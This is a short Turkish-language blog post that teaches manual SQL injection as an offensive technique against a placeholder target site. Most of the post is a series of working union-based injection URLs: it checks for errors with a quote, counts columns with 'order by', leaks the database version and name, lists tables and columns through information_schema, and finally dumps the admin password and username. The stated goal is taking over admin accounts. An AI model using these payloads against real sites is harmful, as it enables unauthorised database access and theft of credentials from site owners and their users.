Manuel SQL Injection | En Basit Anlatım

Manuel SQL Injection | En Basit Anlatım




Herkese Selamun Aleyküm Arkadaşlar 

Bugunkü konumuz Manuel sql injection nedir bu hemen açıklayalım


Sql İnjection Çoğu Zaman Script Kodlamalarında Yanlış Kodlama Sonucunda Oluşan Güvenlik Açığıdır, Bu Açık Sayesinde Admin Bilgilerini Ele Geçirebiliriz.


NOT:
Yanlış Kodlama Php ve Asp Sistemlerde ID Değerinde Oluşur.

http://www.hedefitemiz.com/ürün.php?id=4
http://www.hedefitemiz.com/ürün.php?id=4 (Tırnak işreti biraktık sayfada hata , Veri kaybı vb. olursa sql açığı mevcutur. )
http://www.hedefitemiz.com/ürün.php?id=4' order by 1 -- -  (Order By Komutunun Yanındaki "1" Sayısını Hata Alana Kadar Artırıyoruz) diyelimki hatayı 5 te aldık
http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,3,4 -- -  bu şekilde yaptıktan sonra diyelimki 3 sayısı yansıdı sayfaya 1 ve 5 arasında bir sayı yansıması gerek 3 yansıdı diyom ben

http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,version(),4 -- -  bu kod ile version bilgisini öğrenebiliriz. 
http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,database(),4 -- -bu kod ile database ismini öğrenebiliriz.
Tablo adı nasıl öğrenilir :
http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,                       table_name,4 from information_schema.tables -- -
Burdan admin tablosunu bulunuz diyelimki tablo adı admin onu nasıl çekecez
http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,                       column_name,4 from information_schema.columns where table_name=admin -- -
bu şekildede admin tablosunu çekiyoruz
içinde Herzaman username,password,id çıkar onları nası çekicez ?
http://www.hedefitemiz.com/ürün.php?id=-4' union select 1,2,                       password,4 from admin -- -
bu şekilde password çekebilirsiniz password silip username yazarsanız
username kısmınıda çekersiniz. 
bugünkü dersimiz bu kadardı bir dahaki konulara görüşmek üzere bol hackler .






Yorum Gönder

2 Yorumlar